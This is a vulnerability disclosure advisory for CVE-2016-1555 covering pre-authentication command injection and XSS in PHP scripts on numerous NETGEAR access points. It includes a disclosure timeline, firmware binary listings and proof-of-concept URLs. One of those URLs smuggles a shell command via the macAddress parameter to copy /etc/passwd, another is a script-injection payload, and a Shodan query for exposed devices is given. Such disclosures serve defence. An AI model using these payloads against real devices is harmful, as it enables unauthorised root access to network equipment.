################################################################################ METADATA DETAILS Title: ACSA-2015-001 CVE-2016-1555 - Command injection independently discovered by Chen et. al. Original CVE-2016-1555 enumerates only a part of the whole set of affected products. Timeline: 03 Nov 2014 - [Researcher] discovery 02 Dec 2015 - [Researcher] sends vendor notification at security@netgear.com, public disclosure set for 28 Dec 2015 10 Dec 2015 - [Researcher] sends vendor notification at security@netgear.com with all the details an PoC, public disclosure set for 28 Dec 2015 16 Dec 2015 - [Vendor] replies requesting "a standard 90-days grace period before public disclosure" and to fill "NETGEAR Product Vulnerability Reporting Submission Form.xlsx" 17 Dec 2015 - [Researcher] replies with filled "ACSA-2015-001 - NETGEAR Product Vulnerability Reporting Submission Form.xlsx", agrees to 90-days grace period, asks vendor to created CVE numbers and notify/acknowledge the researcher 12 Jan 2016 - [Researcher] follows-up with the vendor on the status and CVE numbers 04 Mar 2016 - [Researcher] reminds about 90-days grace period and public disclosure 31 Mar 2016 17 Mar 2016 - Expires 90-days grace period 31 Mar 2016 - [Researcher] proceeds to public disclosure Author: Andrei Costin, "FIRMWARE.RE" project andrei@firmware.re Vulnerability discovered using "FIRMWARE.RE" platform/service 0. Vulnerability: a) pre-auth Remote Command Execution/Injection (RCE/RCI), effectively gaining root (webserver user) on the device a*) "web non-admin" authenticated user Remote Command Execution/Injection (RCE/RCI), effectively gaining root (webserver user) on the device b) pre-auth Cross-Site Scripting (XSS) b*) "web non-admin" authenticated user Cross-Site Scripting (XSS) 1. NetGear products WG102 WG103 *WN604 *WNDAP350 *WNDAP360 *WNAP320 *WNAP210 *WNDAP660 *WNDAP620 **WNDAP380R **WNDAP380R(v2) **WN370 **WND930 All these products for the bulk of their firmware versions are prone to "pre-auth command injection via vulnerable web interface module". Product WG103 is affected by "pre-auth command injection via vulnerable web interface module" in *ALL* its current firmware versions, and has no known fix. Products with (*) have fixes in the last 1-2 version(s), but the fix does not remove the core issue. The last 1-2 version(s) are prone to "web non-admin authenticated user Remote Command Execution/Injection" and the issue can be triggered with any "web non-admin" authenticated user. The "web admin" and "web non-admin" authenticated users can be exploited with XSS (in the same module(s) as the one affected by the RCE) to gain access to their cookie/session and then trigger the "command injection". The firmware prior to the last 1-2 version(s) are prone to the original "pre-auth command injection via vulnerable web interface module" where no web user account is required to trigger the RCE and the XSS in the affected module(s). Products with (**) are most likely affected too, but I could not verify them yet. 1.1 Is it for Home / Business / Service Provider, is it a Router, Wifi, Camera, Storage, etc Mainly Business/Pro devices of Router class. 2. What are the requirements to attack the affected products? Being able to ping the affected device and open it's web interface (192.168.1.1 or 192.168.1.254) Being connected to the Ethernet or WiFi medium of the product, i.e.: - if WiFi requires WLAN authentication must first WLAN-authenticate; - if WiFi is open or Ethernet LAN is accessible, then there are no other requirements then to be able to access the device web interface (192.168.0.1 or 192.168.1.254) 2.1 Since WWW/WAN is also exposed, does it mean that any device of this sort you can find using Shodan on the Internet can be attacked? Yes. https://www.shodan.io/search?query=title%3A%22Netgear%22+PHP 2.2 Does it need to be configured in some way? No. 2.3 Is the default (factory reset) version of the product affected? Yes, as far as I have analyzed. 2.4 Is there a configuration change that can make the product unaffected? (turning off UPnP for example?) No. Products with (*) have fixes in the last 1-2 version(s), but the fix does not remove the core issue. The last 1-2 version(s) are prone to "web non-admin authenticated user Remote Command Execution/Injection" and the issue can be triggered with any "web non-admin" authenticated user. The web admin and "web non-admin" users can be exploited with XSS to gain access to their cookie/session. 3. Regarding the "Pre Auth OS Command Injection" what are the requirements? - Being able to ping the affected device and open it's web interface (192.168.1.1 or 192.168.1.254) 3.1 What commands can be injected? Any. 3.2 Can parameters to this command be provided? Yes. 3.3 Is there any restrictions on the command line "characters", for example you can only provide alpha numeric characters? No restrictions as far as I have tested and analyzed. ################################################################################ TECHNICAL DETAILS The mentioned products ship with a set of vulnerable PHP scripts, namely: boardDataWW.php boardDataNA.php boardDataJP.php boardData102.php boardData103.php The "boardData102.php" and "boardData103.php" are mainly shipped in WG103. The other files ship with the other products in the list, and the file "boardDataJP.php" is present only in the latest versions though. These scripts take a vulnerable input in the "macAddress" GET field and use it without sanitization. *** a) In one case, these scripts use the "macAddress" input to prepopulate an input field, which results in XSS. b) At the same time, these scripts use the "macAddress" to write some manufacturer data to the board, via an insecure call to PHP's "exec()" without properly sanitizing the input: exec("wr_mfg_data -m ".$_REQUEST['macAddress']." -c ".$_REQUEST['reginfo'],$dummy,$res); which results in RCE. *** Normally, the access to the vulnerable PHP scripts listed above is UNAUTHENTICATED. The latest versions of firmware for products marked with (*) introduced the "session_check()" call to check for authenticated users. However, they did not fix the root cause of these vulnerabilities, namely sanitizatio of "macAddress" and "reginfo" parameters. The PHP's "echo" and "exec" are still called with UNSANITIZED inputs. This can be abused by users without administrative privileges on the web-interface (non-admin users) to execute code on the affected devices. Also, the XSS vulnerability can be used on authenticated users of the device to steal their session token and then execute code via the RCE vulnerability. ################################################################################ POC DETAILS http://NETGEAR-DEVICE-IP/boardDataNA.php?writeData=true®info=0&macAddress=%20001122334455%20-c%200%20;cp%20/etc/passwd%20/tmp/cmdinjfirm-file-touch;%20echo%20# http://NETGEAR-DEVICE-IP/boardDataNA.php?macAddress=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E ################################################################################ WG103 Latest FW version: 2.0.37 pre-auth RCE Kernel-space: Linux "2.6.23-WG103_V2.0.37 mod_unload R4X00 32BIT" User-space: BusyBox 1.11.0 2011-07-05 10:46:01 IST /bin addgroup busybox chgrp cp delgroup echo fgrep gunzip ip login mknod mount nice pipe_progress pwd sed stat tar umount vi adduser cat chmod date df egrep getopt gzip kill ls mktemp mountpoint pidof printenv rm sh su touch uname watch ash catv chown dd dmesg false grep hostname ln mkdir more mv ping ps rmdir sleep sync true usleep zcat /usr/bin [ bddatard clear diff du flash_erase fuser ipcs less mkfifo passwd renice setsid sys_reset tftp unix2dos which xargs [[ bunzip2 cmp dirname dumpleases fold head killall logger nmeter pgrep reset sha1sum tail time uptime who yes ar bzcat crontab dos2unix env free hexdump killall5 logname nohup printf resize sort tee top watchdog whoami awk bzip2 cut dropbearconvert expr ftpget id last md5sum od printmd scp ssh telnet tty wc wifidog basename cksum dbclient dropbearkey find ftpput ipcrm length mesg panel_led readlink seq strings test uniq wget wr_mfg_data /sbin arp halt ifrename insmod iwlist lighttpd lsmod poweroff route sulogin syslogd freeramdisk ifconfig ifup iwconfig iwpriv logread modprobe reboot runlevel switch_root udhcpc getty ifdown init iwevent klogd losetup pivot_root rmmod start-stop-daemon sysctl vconfig /usr/local/bin 80211debug destroy_secondary_ip firmware-upgrade-file ntpclient-wrapper set_timezone.sh timezone wpa_supplicant assign_static_ip dhcp firmware-upgrade-ftp hostapd_tr password snmp TZ.sh athdebug dns firmware-upgrade-stage2 http_redirect_tr php ssh udhcpc_wrapper awddebug dumpregs firmware-upgrade-tftp nmbd_tr restart-nmbd support-debug.sh urlValidate.php bridge_and_vlan_translator ethtool_tr firmware-upgrade-wget ntp restart-wifidog syslog verify-config.sh date.sh firmware-error-check hostapd ntpclient restore-configuration telnet wlanconfig ################################################################################ WN604 Latest FW version: 3.3.2 "web non-admin" user RCE Kernel-space: Linux "2.6.15--LSDK-7.3.0.387-WN604_V3.3.2 MIPS32_R2 32BIT gcc-3.4" User-space: BusyBox v1.11.0 (2015-06-26 14:38:15 IST) /bin ash cat chown date dmesg egrep fgrep grep hostname kill login md mknod more mv pidof ps rm sed sleep sync touch umount vi busybox chmod cp dd echo false getopt gunzip ip ln ls mkdir mm mount nice ping pwd rmdir sh su tar true uname zcat /usr/bin [ awk bunzip2 crontab dos2unix find fold ftpput id logger mkfifo passwd printmd seq tail test top uptime wget wr_mfg_data [[ basename bzcat cut env flashcp free fuser killall logname nohup pgrep readlink sort tee tftp tty watchdog which xargs arping bddatard cksum dirname expr flash_erase ftpget head length md5sum panel_led printf reset_detect strings telnet time unix2dos wc who yes /sbin arp halt ifrename insmod iwevent iwpriv lighttpd lsmod poweroff rmmod start-stop-daemon syslogd vconfig getty ifconfig init iwconfig iwlist klogd logread pivot_root reboot route switch_root udhcpc /usr/local/bin 80211debug date.sh exr.sh hostapd_cli password sc_radio update_hostapd wpa_and_wpa2_psk art.sh db_enc firmware-error-check php set_radio_cron update_rfStatus wpa_supplicant assign_static_ip destroy_secondary_ip firmware-upgrade-file hostapd_tr set_timezone.sh update_wps_configured athdebug dhcp firmware-upgrade-stage2 nmbd_tr reset_hostapd.sh syslog urlValidate.php awddebug dns firmware-upgrade-tftp ntp restart-nmbd timezone validate-config-version.sh bridge_and_vlan_translator dumpregs firmware-upgrade-wget ntpclient restart-wifidog TZ.sh verify-config.sh client_bridge_tr dxr.sh hostapd ntpclient-wrapper restore-configuration udhcpc_wrapper wlanconfig ################################################################################ WNDAP350 Latest FW version: 3.0.0.7 "web non-admin" user RCE Kernel-space: Linux "2.6.23-WNDAP350_V3.0.0.7 mod_unload MIPS32_R2 32BIT" User-space: BusyBox v1.11.0 (2015-06-18 21:22:24 IST) /bin addgroup busybox chgrp cp delgroup echo fgrep gunzip ip login mkdir mm mountpoint pidof printenv rm sh su touch uname watch adduser cat chmod date df egrep getopt gzip kill ls mknod more mv ping ps rmdir sleep sync true usleep zcat ash catv chown dd dmesg false grep hostname ln md mktemp mount nice pipe_progress pwd sed stat tar umount vi /usr/bin [ blink_gpio cmp dos2unix find fold hexdump length nandwrite pgrep reset_detect sha1sum telnet unix2dos whoami [[ bringdown_vaps crontab dropbearconvert firmware_upgrade_led_blink free id less nmeter printf resize sort test uptime wifidog ar bunzip2 curl dropbearkey flashcp ftpget ipcrm logger nohup printmd scp ssh tftp watchdog wr_mfg_data arping bzcat cut du flash_erase ftpput ipcs logname od readlink seq strings time wc xargs awk bzip2 dbclient dumpleases flash_eraseall fuser killall md5sum openssl renice set_ipv6_addr tac top wget yes basename cksum diff env flash_lock fw_printenv killall5 mesg panel_led reset set_manuinfo tail tty which bddatard clear dirname expr flash_unlock head last mkfifo passwd reset_button setsid tee uniq who /sbin arp getty ifconfig ifrename init iwconfig iwlist klogd logread lsmod pivot_root reboot route start-stop-daemon switch_root syslogd vconfig freeramdisk halt ifdown ifup insmod iwevent iwpriv lighttpd losetup modprobe poweroff rmmod runlevel sulogin sysctl udhcpc /usr/local/bin 80211debug date.sh dxr.sh hostapd_tr ntpdate qos_setdb_x snmp upmigration.sh art.sh db_enc exr.sh http_redirect_tr ntpdate-wrapper radartool ssh urlValidate.php assign_static_ip destroy_secondary_ip firmware-error-check led_amber pal.netgear reset_hostapd.sh support-debug.sh validate-config-version.sh assign_static_ipv6 dhcp firmware-upgrade-file led_green pal_translator restart-nmbd syslog verify-config.sh athdebug dibbler-client.sh firmware-upgrade-stage2 led_off password restart-wifidog sysmonitor.sh versions.sh awddebug dibbler-server.sh firmware-upgrade-tftp migration.sh php restore-configuration telnet wlanconfig bridge_and_vlan_translator dns firmware-upgrade-wget nmbd_tr pktCapture sc_radio timezone wpa_supplicant capture_app dump_config_logs_tr hostapd ntp prnt_wlan_buffs.sh set_radio_cron TZ.sh config_palcfg dumpregs ntpclient-wrapper qos_delete_qdiscs set_timezone.sh udhcpc_wrapper ################################################################################ WNDAP360 Latest FW version: 3.0.0.7 "web non-admin" user RCE Kernel-space: Linux "2.6.23-WNDAP360_V3.0.0.7 mod_unload MIPS32_R2 32BIT" User-space: BusyBox v1.11.0 (2015-06-18 21:19:26 IST) /bin addgroup busybox chgrp cp delgroup echo fgrep gunzip ip login mkdir mm mountpoint pidof printenv rm sh su touch uname watch adduser cat chmod date df egrep getopt gzip kill ls mknod more mv ping ps rmdir sleep sync true usleep zcat ash catv chown dd dmesg false grep hostname ln md mktemp mount nice pipe_progress pwd sed stat tar umount vi /usr/bin [ bunzip2 cut dumpleases flash_lock head length nmeter printmd seq tac tty who [[ bzcat dbclient env flash_unlock hexdump less nohup readlink set_ipv6_addr tail uniq whoami ar bzip2 diff expr fold id logger od renice set_manuinfo tee unix2dos wifidog awk cksum dirname find free ipcrm logname openssl reset setsid telnet uptime wr_mfg_data basename clear dos2unix firmware_upgrade_led_blink ftpget ipcs md5sum panel_led reset_button sha1sum test watchdog xargs bddatard cmp dropbearconvert flashcp ftpput killall mesg passwd reset_detect sort tftp wc yes blink_gpio crontab dropbearkey flash_erase fuser killall5 mkfifo pgrep resize ssh time wget bringdown_vaps curl du flash_eraseall fw_printenv last nandwrite printf scp strings top which /sbin arp getty ifconfig ifrename init iwconfig iwlist klogd logread lsmod pivot_root reboot route start-stop-daemon switch_root syslogd vconfig freeramdisk halt ifdown ifup insmod iwevent iwpriv lighttpd losetup modprobe poweroff rmmod runlevel sulogin sysctl udhcpc /usr/local/bin 80211debug date.sh dxr.sh ntpclient-wrapper qos_delete_qdiscs set_timezone.sh udhcpc_wrapper art.sh db_enc exr.sh hostapd_tr ntpdate qos_setdb_x snmp upmigration.sh assign_static_ip destroy_secondary_ip firmware-error-check http_redirect_tr ntpdate-wrapper radartool ssh urlValidate.php assign_static_ipv6 dhcp firmware-upgrade-file led_amber pal.netgear reset_hostapd.sh support-debug.sh validate-config-version.sh athdebug dibbler-client.sh firmware-upgrade-ftp led_green pal_translator restart-nmbd syslog verify-config.sh awddebug dibbler-server.sh firmware-upgrade-stage2 led_off password restart-wifidog sysmonitor.sh versions.sh bridge_and_vlan_translator dns firmware-upgrade-tftp migration.sh php restore-configuration telnet wlanconfig capture_app dump_config_logs_tr firmware-upgrade-wget nmbd_tr pktCapture sc_radio timezone wpa_supplicant config_palcfg dumpregs hostapd ntp prnt_wlan_buffs.sh set_radio_cron TZ.sh ################################################################################ WNAP320 Latest FW version: 3.0.0.7 "web non-admin" user RCE Kernel-space: Linux "2.6.23-WNAP320_V3.0.0.7 mod_unload MIPS32_R2 32BIT" User-space: BusyBox v1.11.0 (2015-06-18 21:25:40 IST) /bin addgroup busybox catv chown dd dmesg false grep hostname ln mkdir more mv ping ps rmdir sleep sync true usleep zcat adduser chgrp cp delgroup echo fgrep gunzip ip login mknod mount nice pipe_progress pwd sed stat tar umount vi ash cat chmod date df egrep getopt gzip kill ls mktemp mountpoint pidof printenv rm sh su touch uname watch /usr/bin [ blink_gpio cmp dos2unix find fold hexdump length nandwrite pgrep reset_detect sha1sum telnet unix2dos whoami [[ bringdown_vaps crontab dropbearconvert firmware_upgrade_led_blink free id less nmeter printf resize sort test uptime wifidog ar bunzip2 curl dropbearkey flashcp ftpget ipcrm logger nohup printmd scp ssh tftp watchdog wr_mfg_data arping bzcat cut du flash_erase ftpput ipcs logname od readlink seq strings time wc xargs awk bzip2 dbclient dumpleases flash_eraseall fuser killall md5sum openssl renice set_ipv6_addr tac top wget yes basename cksum diff env flash_lock fw_printenv killall5 mesg panel_led reset set_manuinfo tail tty which bddatard clear dirname expr flash_unlock head last mkfifo passwd reset_button setsid tee uniq who /sbin arp getty ifconfig ifrename init iwconfig iwlist klogd logread lsmod pivot_root reboot route start-stop-daemon switch_root syslogd vconfig freeramdisk halt ifdown ifup insmod iwevent iwpriv lighttpd losetup modprobe poweroff rmmod runlevel sulogin sysctl udhcpc /usr/local/bin 80211debug date.sh exr.sh http_redirect_tr pal.netgear restart-nmbd sysmonitor.sh wlanconfig art.sh db_enc firmware-error-check led_amber pal_translator restart-wifidog telnet wpa_supplicant assign_static_ip destroy_secondary_ip firmware-upgrade-file led_green password restore-configuration timezone assign_static_ipv6 dhcp firmware-upgrade-ftp led_off php sc_radio TZ.sh athdebug dibbler-client.sh firmware-upgrade-stage2 migration.sh pktCapture set_radio_cron udhcpc_wrapper awddebug dibbler-server.sh firmware-upgrade-tftp nmbd_tr prnt_wlan_buffs.sh set_timezone.sh upmigration.sh bridge_and_vlan_translator dns firmware-upgrade-wget ntp qos_delete_qdiscs snmp urlValidate.php capture_app dump_config_logs_tr hostapd ntpclient-wrapper qos_setdb_x ssh validate-config-version.sh client_bridge_tr dumpregs ntpdate radartool support-debug.sh verify-config.sh config_palcfg dxr.sh hostapd_tr ntpdate-wrapper reset_hostapd.sh syslog versions.sh ################################################################################ WNAP210 Latest FW version: 3.0.0.7 "web non-admin" user RCE Kernel-space: Linux "2.6.23-WNAP210_V3.0.0.7 mod_unload MIPS32_R2 32BIT" User-space: BusyBox v1.11.0 (2015-06-18 21:34:15 IST) /bin addgroup busybox chgrp cp delgroup echo fgrep gunzip ip login mkdir mm mountpoint pidof printenv rm sh su touch uname watch adduser cat chmod date df egrep getopt gzip kill ls mknod more mv ping ps rmdir sleep sync true usleep zcat ash catv chown dd dmesg false grep hostname ln md mktemp mount nice pipe_progress pwd sed stat tar umount vi /usr/bin [ blink_gpio cmp dos2unix find fold hexdump led-op mkfifo pgrep reset_detect sha1sum telnet unix2dos whoami [[ bringdown_vaps crontab dropbearconvert firmware_upgrade_led_blink free id length nandwrite printf resize sort test uptime wifidog ar bunzip2 curl dropbearkey flashcp ftpget ipcrm less nmeter printmd scp ssh tftp watchdog wr_mfg_data arping bzcat cut du flash_erase ftpput ipcs logger nohup readlink seq strings time wc xargs awk bzip2 dbclient dumpleases flash_eraseall fuser killall logname od renice set_ipv6_addr tac top wget yes basename cksum diff env flash_lock fw_printenv killall5 md5sum openssl reset set_manuinfo tail tty which bddatard clear dirname expr flash_unlock head last mesg passwd reset_button setsid tee uniq who /sbin arp getty ifconfig ifrename init iwconfig iwlist klogd logread lsmod pivot_root reboot route start-stop-daemon switch_root syslogd vconfig freeramdisk halt ifdown ifup insmod iwevent iwpriv lighttpd losetup modprobe poweroff rmmod runlevel sulogin sysctl udhcpc /usr/local/bin 80211debug date.sh dxr.sh hostapd_tr ntpdate reset_hostapd.sh support-debug.sh validate-config-version.sh art.sh db_enc exr.sh http_redirect_tr ntpdate-wrapper restart-nmbd syslog verify-config.sh assign_static_ip destroy_secondary_ip firmware-error-check led_amber pal.netgear restart-wifidog sysmonitor.sh versions.sh assign_static_ipv6 dhcp firmware-upgrade-file led_green pal_translator restore-configuration telnet wlanconfig athdebug dibbler-client.sh firmware-upgrade-stage2 led_off password sc_radio timezone wpa_supplicant awddebug dibbler-server.sh firmware-upgrade-tftp migration.sh php set_radio_cron TZ.sh bridge_and_vlan_translator dns firmware-upgrade-wget nmbd_tr prnt_wlan_buffs.sh set_timezone.sh udhcpc_wrapper client_bridge_tr dump_config_logs_tr hostapd ntp qos_delete_qdiscs snmp upmigration.sh config_palcfg dumpregs ntpclient-wrapper qos_setdb_x ssh urlValidate.php ################################################################################ WNDAP620 Latest FW version: 2.0.8 "web non-admin" user RCE Kernel-space: Linux "2.6.36.2-wndap660_620-WNDAP620_V2.0.8 mod_unload PowerPC/cisco4500 32BIT MSB" User-space: /bin addgroup busybox chgrp cp delgroup echo fgrep gunzip ip login mknod mount nice ping6 ps rmdir sleep sync true usleep zcat adduser cat chmod date df egrep getopt gzip kill ls mktemp mountpoint pidof pipe_progress pwd sed stat tar umount vi ash catv chown dd dmesg false grep hostname ln mkdir more mv ping printenv rm sh su touch uname watch /usr/bin [ bunzip2 dbclient expr free ipcs mesg readlink setsid test wget [[ bzcat diff find ftpget killall mkfifo renice sha1sum tftp which ar bzip2 dirname firmware_upgrade_led_blink ftpput killall5 nandwrite reset sort time who arping cksum dos2unix flashcp fuser last nmeter reset_button ssh top whoami awk clear dropbearconvert flash_erase fw_printenv length nohup resize strings tty wifidog basename cmp dropbearkey flash_eraseall head less od passwd scp tac uniq wr_mfg_data bddatard c_rehash du flash_lock hexdump logger openssl pgrep seq tail unix2dos xargs blink_gpio crontab dumpleases flash_unlock id logname printf set_ipv6_addr tee uptime yes bringdown_vaps cut env fold ipcrm md5sum printmd set_manuinfo telnet wc /sbin arp halt ifrename init iwevent klogd lldpd lsmod poweroff route sulogin syslogd freeramdisk ifconfig ifrename-compress-1 insmod iwlist lighttpd logread modprobe reboot runlevel switch_root udhcpc getty ifdown ifup iwconfig iwpriv lldpctl losetup pivot_root rmmod start-stop-daemon sysctl vconfig /usr/local/bin assign_static_ip dibbler-client.sh exr.sh set_radio_cron assign_static_ipv6 dibbler-relay firmware-error-check libelf.def set_timezone.sh bridge_and_vlan_translator firmware-upgrade-file libelf.h pktCapture snmp capture_app dibbler_relay-DHCPRelay.o firmware-upgrade-ftp libelf.so poe_test ssh date.sh dibbler_relay-dibbler-relay.o firmware-upgrade-stage2 libelf.so.0 migration.sh prnt_wlan_buffs.sh syslog db_enc dibbler-requestor firmware-upgrade-tftp libelf.so.0.8.13 nmbd_tr qos_delete_qdiscs tc destroy_secondary_ip dibbler_requestor-Requestor.o firmware-upgrade-wget ntp qos_setdb_x telnet dhcp dibbler-server hostapd_tr ntpclient qos_translator timezone dibbler-client http_redirect_tr ntpclient-wrapper radvd TZ.sh dibbler_server-DHCPServer.o ipsd ntpdate reset_hostapd.sh udhcpc_wrapper dibbler_server-dibbler-server.o led_amber ntpdate-wrapper restart-nmbd urlValidate.php dibbler-server.sh led_green password restart-wifidog validate-config-version.sh dibbler_client-DHCPClient.o dns led_off mailsend php restore-configuration verify-config.sh dibbler_client-dibbler-client.o dxr.sh libelf.a sc_radio ################################################################################ WNDAP660 Latest FW version: 2.0.5 "web non-admin" user RCE Kernel-space: Linux "2.6.36.2-wndap660_620-WNDAP660_V2.0.5 mod_unload PowerPC/cisco4500 32BIT MSB" User-space: BusyBox v1.11.0 (2015-05-11 20:42:48 IST) /bin addgroup busybox catv chown dd dmesg false grep hostname ln md mktemp mount nice ping6 ps rmdir sleep sync true usleep zcat adduser chgrp cp delgroup echo fgrep gunzip ip login mkdir mm mountpoint pidof pipe_progress pwd sed stat tar umount vi ash cat chmod date df egrep getopt gzip kill ls mknod more mv ping printenv rm sh su touch uname watch /usr/bin [ bunzip2 dbclient expr free ipcs mesg readlink setsid test wget [[ bzcat diff find ftpget killall mkfifo renice sha1sum tftp which ar bzip2 dirname firmware_upgrade_led_blink ftpput killall5 nandwrite reset sort time who arping cksum dos2unix flashcp fuser last nmeter reset_button ssh top whoami awk clear dropbearconvert flash_erase fw_printenv length nohup resize strings tty wifidog basename cmp dropbearkey flash_eraseall head less od passwd scp tac uniq wr_mfg_data bddatard c_rehash du flash_lock hexdump logger openssl pgrep seq tail unix2dos xargs blink_gpio crontab dumpleases flash_unlock id logname printf set_ipv6_addr tee uptime yes bringdown_vaps cut env fold ipcrm md5sum printmd set_manuinfo telnet wc /sbin arp halt ifrename init iwevent klogd lldpd lsmod poweroff route sulogin syslogd freeramdisk ifconfig insmod iwlist lighttpd logread modprobe reboot runlevel switch_root udhcpc getty ifdown ifup iwconfig iwpriv lldpctl losetup pivot_root rmmod start-stop-daemon sysctl vconfig /usr/local/bin assign_static_ip dibbler_client-dibbler-client.o dxr.sh libelf.a sc_radio assign_static_ipv6 dibbler-client.sh exr.sh set_radio_cron bridge_and_vlan_translator dibbler-relay firmware-error-check libelf.def set_timezone.sh capture_app firmware-upgrade-file libelf.h pktCapture snmp config-chainmask.sh dibbler_relay-DHCPRelay.o firmware-upgrade-ftp libelf.so poe_test ssh date.sh dibbler_relay-dibbler-relay.o firmware-upgrade-stage2 libelf.so.0 migration.sh prnt_wlan_buffs.sh syslog db_enc dibbler-requestor firmware-upgrade-tftp libelf.so.0.8.13 nmbd_tr qos_delete_qdiscs tc destroy_secondary_ip dibbler_requestor-Requestor.o firmware-upgrade-wget ntp qos_setdb_x telnet dhcp dibbler-server hostapd_tr ntpclient qos_translator timezone dibbler-client http_redirect_tr ntpclient-wrapper radvd TZ.sh dibbler_server-DHCPServer.o ipsd ntpdate reset_hostapd.sh udhcpc_wrapper dibbler_server-dibbler-server.o led_amber ntpdate-wrapper restart-nmbd urlValidate.php dibbler-server.sh led_green password restart-wifidog validate-config-version.sh dibbler_client-DHCPClient.o dns led_off mailsend php restore-configuration verify-config.sh